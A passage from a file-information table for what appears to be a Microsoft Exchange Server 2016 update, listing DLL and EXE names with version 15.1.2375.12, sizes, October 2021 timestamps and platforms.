\nMicrosoft.exchange.data.provisioning.dll| 15.1.2375.12| 56,704| 4-Oct-21| 8:32| x86 \nMicrosoft.exchange.data.rightsmanagement.dll| 15.1.2375.12| 452,488| 4-Oct-21| 8:32| x86 \nMicrosoft.exchange.data.scheduledtimers.dll| 15.1.2375.12| 32,632| 4-Oct-21| 8:42| x86 \nMicrosoft.exchange.data.storage.clientstrings.dll| 15.1.2375.12| 256,400| 4-Oct-21| 7:54| x86 \nMicrosoft.exchange.data.storage.dll| 15.1.2375.12| #########| 4-Oct-21| 8:41| x86 \nMicrosoft.exchange.data.storage.eventlog.dll| 15.1.2375.12| 37,768| 4-Oct-21| 7:51| x64 \nMicrosoft.exchange.data.storageconfigurationresources.dll| 15.1.2375.12| 655,760| 4-Oct-21| 8:07| x86 \nMicrosoft.exchange.data.storeobjects.dll| 15.1.2375.12| 174,472| 4-Oct-21| 8:32| x86 \nMicrosoft.exchange.data.throttlingservice.client.dll| 15.1.2375.12| 36,232| 4-Oct-21| 8:32| x86 \nMicrosoft.exchange.data.throttlingservice.client.eventlog.dll| 15.1.2375.12| 14,216| 4-Oct-21| 7:52| x64 \nMicrosoft.exchange.data.throttlingservice.eventlog.dll| 15.1.2375.12| 14,224| 4-Oct-21| 7:53| x64 \nMicrosoft.exchange.datacenter.management.activemonitoring.recoveryservice.eventlog.dll| 15.1.2375.12| 14,736| 4-Oct-21| 7:51| x64 \nMicrosoft.exchange.datacenterstrings.dll| 15.1.2375.12| 72,592| 4-Oct-21| 9:46| x86 \nMicrosoft.exchange.delivery.eventlog.dll| 15.1.2375.12| 13,176| 4-Oct-21| 7:50| x64 \nMicrosoft.exchange.diagnostics.certificatelogger.dll| 15.1.2375.12| 22,904| 4-Oct-21| 8:36| x86 \nMicrosoft.exchange.diagnostics.dll| 15.1.2375.12| 1,813,384| 4-Oct-21| 7:55| x86 \nMicrosoft.exchange.diagnostics.dll.deploy| 15.1.2375.12| 1,813,384| 4-Oct-21| 7:55| Not applicable \nMicrosoft.exchange.diagnostics.performancelogger.dll| 15.1.2375.12| 23,944| 4-Oct-21| 8:11| x86 \nMicrosoft.exchange.diagnostics.service.common.dll| 15.1.2375.12| 546,696| 4-Oct-21| 8:09| x86 \nMicrosoft.exchange.diagnostics.service.eventlog.dll| 15.1.2375.12| 215,440| 4-Oct-21| 7:53| x64 \nMicrosoft.exchange.diagnostics.service.exchangejobs.dll| 15.1.2375.12| 193,424| 4-Oct-21| 9:00| x86 \nMicrosoft.exchange.diagnostics.service.exe| 15.1.2375.12| 146,312| 4-Oct-21| 8:34| x86 \nMicrosoft.exchange.diagnostics.service.fuseboxperfcounters.dll| 15.1.2375.12| 27,520| 4-Oct-21| 8:11| x86 \nMicrosoft.exchange.diagnosticsaggregation.eventlog.dll| 15.1.2375.12| 13,712| 4-Oct-21| 7:52| x64 \nMicrosoft.exchange.diagnosticsaggregationservicelet.dll| 15.1.2375.12| 49,528| 4-Oct-21| 9:08| x86 \nMicrosoft.exchange.directory.topologyservice.eventlog.dll| 15.1.2375.12| 28,032| 4-Oct-21| 7:53| x64 \nMicrosoft.exchange.directory.topologyservice.exe| 15.1.2375.12| 208,760| 4-Oct-21| 8:52| x86 \nMicrosoft.exchange.disklocker.events.dll| 15.1.2375.12| 88,960| 4-Oct-21| 7:50| x64 \nMicrosoft.exchange.disklocker.interop.dll| 15.1.2375.12| 32,632| 4-Oct-21| 8:07| x86 \nMicrosoft.exchange.drumtesting.calendarmigration.dll| 15.1.2375.12| 45,944| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.drumtesting.common.dll| 15.1.2375.12| 18,832| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.dxstore.dll| 15.1.2375.12| 473,488| 4-Oct-21| 8:11| x86 \nMicrosoft.exchange.dxstore.ha.events.dll| 15.1.2375.12| 206,216| 4-Oct-21| 7:47| x64 \nMicrosoft.exchange.dxstore.ha.instance.exe| 15.1.2375.12| 36,728| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.eac.flighting.dll| 15.1.2375.12| 131,448| 4-Oct-21| 8:09| x86 \nMicrosoft.exchange.edgecredentialsvc.exe| 15.1.2375.12| 21,896| 4-Oct-21| 8:33| x86 \nMicrosoft.exchange.edgesync.common.dll| 15.1.2375.12| 148,368| 4-Oct-21| 8:34| x86 \nMicrosoft.exchange.edgesync.datacenterproviders.dll| 15.1.2375.12| 220,024| 4-Oct-21| 8:37| x86 \nMicrosoft.exchange.edgesync.eventlog.dll| 15.1.2375.12| 23,928| 4-Oct-21| 7:52| x64 \nMicrosoft.exchange.edgesyncsvc.exe| 15.1.2375.12| 97,656| 4-Oct-21| 8:36| x86 \nMicrosoft.exchange.ediscovery.export.dll| 15.1.2375.12| 1,266,040| 4-Oct-21| 8:07| x86 \nMicrosoft.exchange.ediscovery.export.dll.deploy| 15.1.2375.12| 1,266,040| 4-Oct-21| 8:07| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.application| Not applicable| 16,506| 4-Oct-21| 8:08| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.exe.deploy| 15.1.2375.12| 87,440| 4-Oct-21| 8:08| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.manifest| Not applicable| 67,491| 4-Oct-21| 8:07| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.strings.dll.deploy| 15.1.2375.12| 52,112| 4-Oct-21| 7:50| Not applicable \nMicrosoft.exchange.ediscovery.mailboxsearch.dll| 15.1.2375.12| 294,280| 4-Oct-21| 9:11| x86 \nMicrosoft.exchange.entities.birthdaycalendar.dll| 15.1.2375.12| 72,592| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.entities.booking.defaultservicesettings.dll| 15.1.2375.12| 45,960| 4-Oct-21| 8:42| x86 \nMicrosoft.exchange.entities.booking.dll| 15.1.2375.12| 218,000| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.entities.booking.management.dll| 15.1.2375.12| 78,200| 4-Oct-21| 8:52| x86 \nMicrosoft.exchange.entities.bookings.dll| 15.1.2375.12| 35,704| 4-Oct-21| 8:52| x86 \nMicrosoft.exchange.entities.calendaring.dll| 15.1.2375.12| 932,216| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.entities.common.dll| 15.1.2375.12| 336,264| 4-Oct-21| 8:52| x86 \nMicrosoft.exchange.entities.connectors.dll| 15.1.2375.12| 52,600| 4-Oct-21| 8:52| x86 \nMicrosoft.exchange.entities.contentsubmissions.dll| 15.1.2375.12| 32,136| 4-Oct-21| 9:00| x86 \nMicrosoft.exchange.entities.context.dll| 15.1.2375.12| 60,792| 4-Oct-21| 8:52| x86 \nMicrosoft.exchange.entities.datamodel.dll| 15.1.2375.12| 854,408| 4-Oct-21| 8:52| x86 \nMicrosoft.exchange.entities.fileproviders.dll| 15.1.2375.12| 290,704| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.entities.foldersharing.dll| 15.1.2375.12| 39,304| 4-Oct-21| 9:00| x86 \nMicrosoft.exchange.entities.holidaycalendars.dll| 15.1.2375.12| 76,176| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.entities.insights.dll| 15.1.2375.12| 166,776| 4-Oct-21| 9:22| x86 \nMicrosoft.exchange.entities.meetinglocation.dll| 15.1.2375.12| 1,486,736| 4-Oct-21| 9:25| x86 \nMicrosoft.exchange.entities.meetingparticipants.dll| 15.1.2375.12| 122,256| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.entities.meetingtimecandidates.dll| 15.1.2375.12| #########| 4-Oct-21| 9:27| x86 \nMicrosoft.exchange.entities.onlinemeetings.dll| 15.1.2375.12| 263,560| 4-Oct-21| 9:00| x86 \nMicrosoft.exchange.entities.people.dll| 15.1.2375.12| 37,776| 4-Oct-21| 8:52| x86 \nMicrosoft.exchange.entities.peopleinsights.dll| 15.1.2375.12| 186,768| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.entities.reminders.dll| 15.1.2375.12| 64,392| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.entities.schedules.dll| 15.1.2375.12| 83,856| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.entities.shellservice.dll| 15.1.2375.12| 63,880| 4-Oct-21| 8:42| x86 \nMicrosoft.exchange.entities.tasks.dll| 15.1.2375.12| 99,712| 4-Oct-21| 9:00| x86 \nMicrosoft.exchange.entities.xrm.dll| 15.1.2375.12| 144,760| 4-Oct-21| 8:52| x86 \nMicrosoft.exchange.entityextraction.calendar.dll| 15.1.2375.12| 270,224| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.eserepl.common.dll| 15.1.2375.12| 15,232| 4-Oct-21| 7:47| x86 \nMicrosoft.exchange.eserepl.configuration.dll| 15.1.2375.12| 15,760| 4-Oct-21| 8:09| x86 \nMicrosoft.exchange.eserepl.dll| 15.1.2375.12| 131,984| 4-Oct-21| 8:25| x86 \nMicrosoft.exchange.ews.configuration.dll| 15.1.2375.12| 254,352| 4-Oct-21| 8:42| x86 \nMicrosoft.exchange.exchangecertificate.eventlog.dll| 15.1.2375.12| 13,176| 4-Oct-21| 7:51| x64 \nMicrosoft.exchange.exchangecertificateservicelet.dll| 15.1.2375.12| 37,264| 4-Oct-21| 9:40| x86 \nMicrosoft.exchange.extensibility.internal.dll| 15.1.2375.12| 641,912| 4-Oct-21| 8:19| x86 \nMicrosoft.exchange.extensibility.partner.dll| 15.1.2375.12| 37,240| 4-Oct-21| 8:52| x86 \nMicrosoft.exchange.federateddirectory.dll| 15.1.2375.12| 146,304| 4-Oct-21| 9:50| x86 \nMicrosoft.exchange.ffosynclogmsg.dll| 15.1.2375.12| 13,176| 4-Oct-21| 7:52| x64 \nMicrosoft.exchange.frontendhttpproxy.dll| 15.1.2375.12| 594,296| 4-Oct-21| 9:53| x86 \nMicrosoft.exchange.frontendhttpproxy.eventlogs.dll| 15.1.2375.12| 14,736| 4-Oct-21| 7:52| x64 \nMicrosoft.exchange.frontendtransport.monitoring.dll| 15.1.2375.12| 30,096| 4-Oct-21| 10:34| x86 \nMicrosoft.exchange.griffin.variantconfiguration.dll| 15.1.2375.12| 99,720| 4-Oct-21| 8:09| x86 \nMicrosoft.exchange.hathirdpartyreplication.dll| 15.1.2375.12| 42,360| 4-Oct-21| 8:08| x86 \nMicrosoft.exchange.helpprovider.dll| 15.1.2375.12| 40,832| 4-Oct-21| 9:06| x86 \nMicrosoft.exchange.httpproxy.addressfinder.dll| 15.1.2375.12| 54,136| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.httpproxy.common.dll| 15.1.2375.12| 163,720| 4-Oct-21| 9:00| x86 \nMicrosoft.exchange.httpproxy.diagnostics.dll| 15.1.2375.12| 58,744| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.httpproxy.flighting.dll| 15.1.2375.12| 204,688| 4-Oct-21| 8:09| x86 \nMicrosoft.exchange.httpproxy.passivemonitor.dll| 15.1.2375.12| 17,800| 4-Oct-21| 8:23| x86 \nMicrosoft.exchange.httpproxy.proxyassistant.dll| 15.1.2375.12| 30,584| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.httpproxy.routerefresher.dll| 15.1.2375.12| 38,792| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.httpproxy.routeselector.dll| 15.1.2375.12| 48,504| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.httpproxy.routing.dll| 15.1.2375.12| 180,624| 4-Oct-21| 9:00| x86 \nMicrosoft.exchange.httpredirectmodules.dll| 15.1.2375.12| 36,744| 4-Oct-21| 9:53| x86 \nMicrosoft.exchange.httprequestfiltering.dll| 15.1.2375.12| 28,040| 4-Oct-21| 8:11| x86 \nMicrosoft.exchange.httputilities.dll| 15.1.2375.12| 25,976| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.hygiene.data.dll| 15.1.2375.12| 1,868,168| 4-Oct-21| 9:10| x86 \nMicrosoft.exchange.hygiene.diagnosisutil.dll| 15.1.2375.12| 54,648| 4-Oct-21| 7:47| x86 \nMicrosoft.exchange.hygiene.eopinstantprovisioning.dll| 15.1.2375.12| 35,720| 4-Oct-21| 9:43| x86 \nMicrosoft.exchange.idserialization.dll| 15.1.2375.12| 35,728| 4-Oct-21| 7:47| x86 \nMicrosoft.exchange.imap4.eventlog.dll| 15.1.2375.12| 18,320| 4-Oct-21| 7:53| x64 \nMicrosoft.exchange.imap4.eventlog.dll.fe| 15.1.2375.12| 18,320| 4-Oct-21| 7:53| Not applicable \nMicrosoft.exchange.imap4.exe| 15.1.2375.12| 262,544| 4-Oct-21| 9:00| x86 \nMicrosoft.exchange.imap4.exe.fe| 15.1.2375.12| 262,544| 4-Oct-21| 9:00| Not applicable \nMicrosoft.exchange.imap4service.exe| 15.1.2375.12| 24,968| 4-Oct-21| 9:00| x86 \nMicrosoft.exchange.imap4service.exe.fe| 15.1.2375.12| 24,968| 4-Oct-21| 9:00| Not applicable \nMicrosoft.exchange.imapconfiguration.dl1| 15.1.2375.12| 53,112| 4-Oct-21| 8:09| Not applicable \nMicrosoft.exchange.inference.common.dll| 15.1.2375.12| 216,968| 4-Oct-21| 8:42| x86 \nMicrosoft.exchange.inference.hashtagsrelevance.dll| 15.1.2375.12| 32,120| 4-Oct-21| 9:23| x64 \nMicrosoft.exchange.inference.peoplerelevance.dll| 15.1.2375.12| 281,976| 4-Oct-21| 9:21| x86 \nMicrosoft.exchange.inference.ranking.dll| 15.1.2375.12| 18,808| 4-Oct-21| 8:42| x86 \nMicrosoft.exchange.inference.safetylibrary.dll| 15.1.2375.12| 83,832| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.inference.service.eventlog.dll| 15.1.2375.12| 15,224| 4-Oct-21| 7:52| x64 \nMicrosoft.exchange.infoworker.assistantsclientresources.dll| 15.1.2375.12| 94,096| 4-Oct-21| 7:53| x86 \nMicrosoft.exchange.infoworker.common.dll| 15.1.2375.12| 1,840,520| 4-Oct-21| 9:10| x86 \nMicrosoft.exchange.infoworker.eventlog.dll| 15.1.2375.12| 71,544| 4-Oct-21| 7:52| x64 \nMicrosoft.exchange.infoworker.meetingvalidator.dll| 15.1.2375.12| 175,496| 4-Oct-21| 9:11| x86 \nMicrosoft.exchange.instantmessaging.dll| 15.1.2375.12| 45,960| 4-Oct-21| 7:47| x86 \nMicrosoft.exchange.irm.formprotector.dll| 15.1.2375.12| 159,632| 4-Oct-21| 7:50| x64 \nMicrosoft.exchange.irm.msoprotector.dll| 15.1.2375.12| 51,088| 4-Oct-21| 7:52| x64 \nMicrosoft.exchange.irm.ofcprotector.dll| 15.1.2375.12| 45,952| 4-Oct-21| 7:53| x64 \nMicrosoft.exchange.isam.databasemanager.dll| 15.1.2375.12| 30,584| 4-Oct-21| 8:09| x86 \nMicrosoft.exchange.isam.esebcli.dll| 15.1.2375.12| 100,232| 4-Oct-21| 8:07| x64 \nMicrosoft.exchange.jobqueue.eventlog.dll| 15.1.2375.12| 13,176| 4-Oct-21| 7:52| x64 \nMicrosoft.exchange.jobqueueservicelet.dll| 15.1.2375.12| 271,248| 4-Oct-21| 9:52| x86 \nMicrosoft.exchange.killswitch.dll| 15.1.2375.12| 22,392| 4-Oct-21| 7:47| x86 \nMicrosoft.exchange.killswitchconfiguration.dll| 15.1.2375.12| 33,680| 4-Oct-21| 8:09| x86 \nMicrosoft.exchange.loganalyzer.analyzers.auditing.dll| 15.1.2375.12| 18,320| 4-Oct-21| 7:52| x86 \nMicrosoft.exchange.loganalyzer.analyzers.certificatelog.dll| 15.1.2375.12| 15,248| 4-Oct-21| 7:52| x86 \nMicrosoft.exchange.loganalyzer.analyzers.cmdletinfralog.dll| 15.1.2375.12| 27,536| 4-Oct-21| 7:54| x86 \nMicrosoft.exchange.loganalyzer.analyzers.easlog.dll| 15.1.2375.12| 30,608| 4-Oct-21| 8:32| x86 \nMicrosoft.exchange.loganalyzer.analyzers.ecplog.dll| 15.1.2375.12| 22,416| 4-Oct-21| 7:55| x86 \nMicrosoft.exchange.loganalyzer.analyzers.eventlog.dll| 15.1.2375.12| 66,440| 4-Oct-21| 8:32| x86 \nMicrosoft.exchange.loganalyzer.analyzers.ewslog.dll| 15.1.2375.12| 29,584| 4-Oct-21| 8:07| x86 \nMicrosoft.exchange.loganalyzer.analyzers.griffinperfcounter.dll| 15.1.2375.12| 19,856| 4-Oct-21| 8:32| x86 \nMicrosoft.exchange.loganalyzer.analyzers.groupescalationlog.dll| 15.1.2375.12| 20,368| 4-Oct-21| 7:53| x86 \nMicrosoft.exchange.loganalyzer.analyzers.httpproxylog.dll| 15.1.2375.12| 19,344| 4-Oct-21| 8:33| x86 \nMicrosoft.exchange.loganalyzer.analyzers.hxservicelog.dll| 15.1.2375.12| 34,168| 4-Oct-21| 8:34| x86 \nMicrosoft.exchange.loganalyzer.analyzers.iislog.dll| 15.1.2375.12| 103,824| 4-Oct-21| 7:52| x86 \nMicrosoft.exchange.loganalyzer.analyzers.lameventlog.dll| 15.1.2375.12| 31,632| 4-Oct-21| 8:32| x86 \nMicrosoft.exchange.loganalyzer.analyzers.migrationlog.dll| 15.1.2375.12| 15,752| 4-Oct-21| 7:52| x86 \nMicrosoft.exchange.loganalyzer.analyzers.oabdownloadlog.dll| 15.1.2375.12| 20,880| 4-Oct-21| 8:32| x86 \nMicrosoft.exchange.loganalyzer.analyzers.oauthcafelog.dll| 15.1.2375.12| 16,272| 4-Oct-21| 8:07| x86 \nMicrosoft.exchange.loganalyzer.analyzers.outlookservicelog.dll| 15.1.2375.12| 49,032| 4-Oct-21| 8:32| x86 \nMicrosoft.exchange.loganalyzer.analyzers.owaclientlog.dll| 15.1.2375.12| 44,424| 4-Oct-21| 8:32| x86 \nMicrosoft.exchange.loganalyzer.analyzers.owalog.dll| 15.1.2375.12| 38,264| 4-Oct-21| 8:07| x86 \nMicrosoft.exchange.loganalyzer.analyzers.perflog.dll| 15.1.2375.12| #########| 4-Oct-21| 8:32| x86 \nMicrosoft.exchange.loganalyzer.analyzers.pfassistantlog.dll| 15.1.2375.12| 29,056| 4-Oct-21| 7:52| x86 \nMicrosoft.exchange.loganalyzer.analyzers.rca.dll| 15.1.2375.12| 21,368| 4-Oct-21| 7:52| x86 \nMicrosoft.exchange.loganalyzer.analyzers.restlog.dll| 15.1.2375.12| 24,464| 4-Oct-21| 8:32| x86 \nMicrosoft.exchange.loganalyzer.analyzers.store.dll| 15.1.2375.12| 15,240| 4-Oct-21| 8:32| x86 \nMicrosoft.exchange.loganalyzer.analyzers.transportsynchealthlog.dll| 15.1.2375.12| 21,896| 4-Oct-21| 7:52| x86 \nMicrosoft.exchange.loganalyzer.core.dll| 15.1.2375.12| 89,480| 4-Oct-21| 7:47| x86 \nMicrosoft.exchange.loganalyzer.extensions.auditing.dll| 15.1.2375.12| 20,880| 4-Oct-21| 7:51| x86 \nMicrosoft.exchange.loganalyzer.extensions.certificatelog.dll| 15.1.2375.12| 26,512| 4-Oct-21| 7:51| x86 \nMicrosoft.exchange.loganalyzer.extensions.cmdletinfralog.dll| 15.1.2375.12| 21,392| 4-Oct-21| 7:50| x86 \nMicrosoft.exchange.loganalyzer.extensions.common.dll| 15.1.2375.12| 28,048| 4-Oct-21| 7:50| x86 \nMicrosoft.exchange.loganalyzer.extensions.easlog.dll| 15.1.2375.12| 28,560| 4-Oct-21| 7:52| x86 \nMicrosoft.exchange.loganalyzer.extensions.errordetection.dll| 15.1.2375.12| 36,240| 4-Oct-21| 7:50| x86 \nMicrosoft.exchange.loganalyzer.extensions.ewslog.dll| 15.1.2375.12| 16,784| 4-Oct-21| 7:50| x86 \nMicrosoft.exchange.loganalyzer.extensions.griffinperfcounter.dll| 15.1.2375.12| 19,856| 4-Oct-21| 7:52| x86 \nMicrosoft.exchange.loganalyzer.extensions.groupescalationlog.dll| 15.1.2375.12| 15,248| 4-Oct-21| 7:51| x86 \nMicrosoft.exchange.loganalyzer.extensions.httpproxylog.dll| 15.1.2375.12| 17,296| 4-Oct-21| 7:51| x86 \nMicrosoft.exchange.loganalyzer.extensions.hxservicelog.dll| 15.1.2375.12| 19,856| 4-Oct-21| 7:51| x86 \nMicrosoft.exchange.loganalyzer.extensions.iislog.dll| 15.1.2375.12| 57,232| 4-Oct-21| 7:50| x86 \nMicrosoft.exchange.loganalyzer.extensions.migrationlog.dll| 15.1.2375.12| 17,808| 4-Oct-21| 7:51| x86 \nMicrosoft.exchange.loganalyzer.extensions.oabdownloadlog.dll| 15.1.2375.12| 18,824| 4-Oct-21| 8:32| x86 \nMicrosoft.exchange.loganalyzer.extensions.oauthcafelog.dll| 15.1.2375.12| 16,272| 4-Oct-21| 7:51| x86 \nMicrosoft.exchange.loganalyzer.extensions.outlookservicelog.dll| 15.1.2375.12| 17,808| 4-Oct-21| 7:51| x86 \nMicrosoft.exchange.loganalyzer.extensions.owaclientlog.dll| 15.1.2375.12| 15,232| 4-Oct-21| 7:52| x86 \nMicrosoft.exchange.loganalyzer.extensions.owalog.dll| 15.1.2375.12| 15,232| 4-Oct-21| 7:51| x86 \nMicrosoft.exchange.loganalyzer.extensions.perflog.dll| 15.1.2375.12| 52,600| 4-Oct-21| 7:50| x86 \nMicrosoft.exchange.loganalyzer.extensions.pfassistantlog.dll| 15.1.2375.12| 18,320| 4-Oct-21| 7:51| x86 \nMicrosoft.exchange.loganalyzer.extensions.rca.dll| 15.1.2375.12| 34,168| 4-Oct-21| 7:50| x86 \nMicrosoft.exchange.loganalyzer.extensions.restlog.dll| 15.1.2375.12| 17,288| 4-Oct-21| 8:32| x86 \nMicrosoft.exchange.loganalyzer.extensions.store.dll| 15.1.2375.12| 18,824| 4-Oct-21| 7:51| x86 \nMicrosoft.exchange.loganalyzer.extensions.transportsynchealthlog.dll| 15.1.2375.12| 43,408| 4-Oct-21| 7:51| x86 \nMicrosoft.exchange.loguploader.dll| 15.1.2375.12| 165,256| 4-Oct-21| 8:19| x86 \nMicrosoft.exchange.loguploaderproxy.dll| 15.1.2375.12| 54,648| 4-Oct-21| 8:13| x86 \nMicrosoft.exchange.mailboxassistants.assistants.dll| 15.1.2375.12| 9,063,824| 4-Oct-21| 10:22| x86 \nMicrosoft.exchange.mailboxassistants.attachmentthumbnail.dll| 15.1.2375.12| 33,144| 4-Oct-21| 9:00| x86 \nMicrosoft.exchange.mailboxassistants.common.dll| 15.1.2375.12| 124,304| 4-Oct-21| 9:12| x86 \nMicrosoft.exchange.mailboxassistants.crimsonevents.dll| 15.1.2375.12| 82,808| 4-Oct-21| 7:48| x64 \nMicrosoft.exchange.mailboxassistants.eventlog.dll| 15.1.2375.12| 14,224| 4-Oct-21| 7:53| x64 \nMicrosoft.exchange.mailboxassistants.rightsmanagement.dll| 15.1.2375.12| 30,088| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.mailboxloadbalance.dll| 15.1.2375.12| 661,376| 4-Oct-21| 9:25| x86 \nMicrosoft.exchange.mailboxloadbalance.serverstrings.dll| 15.1.2375.12| 63,360| 4-Oct-21| 9:07| x86 \nMicrosoft.exchange.mailboxreplicationservice.calendarsyncprovider.dll| 15.1.2375.12| 175,496| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.mailboxreplicationservice.common.dll| 15.1.2375.12| 2,785,672| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.mailboxreplicationservice.complianceprovider.dll| 15.1.2375.12| 53,128| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.mailboxreplicationservice.contactsyncprovider.dll| 15.1.2375.12| 151,416| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.mailboxreplicationservice.dll| 15.1.2375.12| 966,520| 4-Oct-21| 9:23| x86 \nMicrosoft.exchange.mailboxreplicationservice.easprovider.dll| 15.1.2375.12| 185,208| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.mailboxreplicationservice.eventlog.dll| 15.1.2375.12| 31,608| 4-Oct-21| 7:52| x64 \nMicrosoft.exchange.mailboxreplicationservice.googledocprovider.dll| 15.1.2375.12| 39,816| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.mailboxreplicationservice.imapprovider.dll| 15.1.2375.12| 105,872| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.mailboxreplicationservice.mapiprovider.dll| 15.1.2375.12| 94,608| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.mailboxreplicationservice.popprovider.dll| 15.1.2375.12| 43,400| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.mailboxreplicationservice.proxyclient.dll| 15.1.2375.12| 18,832| 4-Oct-21| 8:07| x86 \nMicrosoft.exchange.mailboxreplicationservice.proxyservice.dll| 15.1.2375.12| 172,920| 4-Oct-21| 9:22| x86 \nMicrosoft.exchange.mailboxreplicationservice.pstprovider.dll| 15.1.2375.12| 102,264| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.mailboxreplicationservice.remoteprovider.dll| 15.1.2375.12| 98,696| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.mailboxreplicationservice.storageprovider.dll| 15.1.2375.12| 188,792| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.mailboxreplicationservice.syncprovider.dll| 15.1.2375.12| 43,400| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.mailboxreplicationservice.xml.dll| 15.1.2375.12| 447,368| 4-Oct-21| 7:47| x86 \nMicrosoft.exchange.mailboxreplicationservice.xrmprovider.dll| 15.1.2375.12| 89,976| 4-Oct-21| 9:21| x86 \nMicrosoft.exchange.mailboxtransport.monitoring.dll| 15.1.2375.12| 107,920| 4-Oct-21| 10:34| x86 \nMicrosoft.exchange.mailboxtransport.storedriveragents.dll| 15.1.2375.12| 371,080| 4-Oct-21| 9:25| x86 \nMicrosoft.exchange.mailboxtransport.storedrivercommon.dll| 15.1.2375.12| 193,912| 4-Oct-21| 9:10| x86 \nMicrosoft.exchange.mailboxtransport.storedriverdelivery.dll| 15.1.2375.12| 551,312| 4-Oct-21| 9:13| x86 \nMicrosoft.exchange.mailboxtransport.storedriverdelivery.eventlog.dll| 15.1.2375.12| 16,272| 4-Oct-21| 7:53| x64 \nMicrosoft.exchange.mailboxtransport.submission.eventlog.dll| 15.1.2375.12| 15,736| 4-Oct-21| 7:53| x64 \nMicrosoft.exchange.mailboxtransport.submission.storedriversubmission.dll| 15.1.2375.12| 320,904| 4-Oct-21| 9:21| x86 \nMicrosoft.exchange.mailboxtransport.submission.storedriversubmission.eventlog.dll| 15.1.2375.12| 17,808| 4-Oct-21| 7:52| x64 \nMicrosoft.exchange.mailboxtransport.syncdelivery.dll| 15.1.2375.12| 45,456| 4-Oct-21| 9:10| x86 \nMicrosoft.exchange.mailboxtransportwatchdogservicelet.dll| 15.1.2375.12| 18,320| 4-Oct-21| 9:05| x86 \nMicrosoft.exchange.mailboxtransportwatchdogservicelet.eventlog.dll| 15.1.2375.12| 12,680| 4-Oct-21| 7:50| x64 \nMicrosoft.exchange.managedlexruntime.mppgruntime.dll| 15.1.2375.12| 20,856| 4-Oct-21| 7:47| x86 \nMicrosoft.exchange.management.activedirectory.dll| 15.1.2375.12| 415,112| 4-Oct-21| 8:53| x86 \nMicrosoft.exchange.management.classificationdefinitions.dll| 15.1.2375.12| 1,269,640| 4-Oct-21| 8:19| x86 \nMicrosoft.exchange.management.compliancepolicy.dll| 15.1.2375.12| 42,376| 4-Oct-21| 9:05| x86 \nMicrosoft.exchange.management.controlpanel.basics.dll| 15.1.2375.12| 433,544| 4-Oct-21| 8:07| x86 \nMicrosoft.exchange.management.controlpanel.dll| 15.1.2375.12| 4,564,872| 4-Oct-21| 11:29| x86 \nMicrosoft.exchange.management.controlpanel.owaoptionstrings.dll| 15.1.2375.12| 261,008| 4-Oct-21| 8:07| x86 \nMicrosoft.exchange.management.controlpanelmsg.dll| 15.1.2375.12| 33,680| 4-Oct-21| 7:52| x64 \nMicrosoft.exchange.management.deployment.analysis.dll| 15.1.2375.12| 94,096| 4-Oct-21| 8:07| x86 \nMicrosoft.exchange.management.deployment.dll| 15.1.2375.12| 595,848| 4-Oct-21| 9:10| x86 \nMicrosoft.exchange.management.deployment.xml.dll| 15.1.2375.12| 3,561,872| 4-Oct-21| 8:07| x86 \nMicrosoft.exchange.management.detailstemplates.dll| 15.1.2375.12| 67,960| 4-Oct-21| 9:52| x86 \nMicrosoft.exchange.management.dll| 15.1.2375.12| #########| 4-Oct-21| 9:38| x86 \nMicrosoft.exchange.management.edge.systemmanager.dll| 15.1.2375.12| 58,768| 4-Oct-21| 9:45| x86 \nMicrosoft.exchange.management.infrastructure.asynchronoustask.dll| 15.1.2375.12| 23,944| 4-Oct-21| 9:45| x86 \nMicrosoft.exchange.management.jitprovisioning.dll| 15.1.2375.12| 101,768| 4-Oct-21| 9:06| x86 \nMicrosoft.exchange.management.migration.dll| 15.1.2375.12| 544,136| 4-Oct-21| 9:40| x86 \nMicrosoft.exchange.management.mobility.dll| 15.1.2375.12| 305,040| 4-Oct-21| 9:42| x86 \nMicrosoft.exchange.management.nativeresources.dll| 15.1.2375.12| 131,984| 4-Oct-21| 7:52| x64 \nMicrosoft.exchange.management.powershell.support.dll| 15.1.2375.12| 418,704| 4-Oct-21| 9:43| x86 \nMicrosoft.exchange.management.provisioning.dll| 15.1.2375.12| 275,856| 4-Oct-21| 9:45| x86 \nMicrosoft.exchange.management.psdirectinvoke.dll| 15.1.2375.12| 70,536| 4-Oct-21| 9:48| x86 \nMicrosoft.exchange.management.rbacdefinition.dll| 15.1.2375.12| 7,878,008| 4-Oct-21| 8:41| x86 \nMicrosoft.exchange.management.recipient.dll| 15.1.2375.12| 1,501,072| 4-Oct-21| 9:42| x86 \nMicrosoft.exchange.management.reportingwebservice.dll| 15.1.2375.12| 145,288| 4-Oct-21| 9:57| x86 